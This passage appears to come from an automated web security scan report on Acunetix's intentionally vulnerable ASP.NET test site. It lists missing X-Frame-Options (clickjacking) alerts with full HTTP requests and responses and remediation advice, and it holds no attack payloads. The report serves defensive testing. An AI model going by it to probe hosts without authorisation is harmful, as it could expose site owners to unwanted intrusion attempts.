ml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        26. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
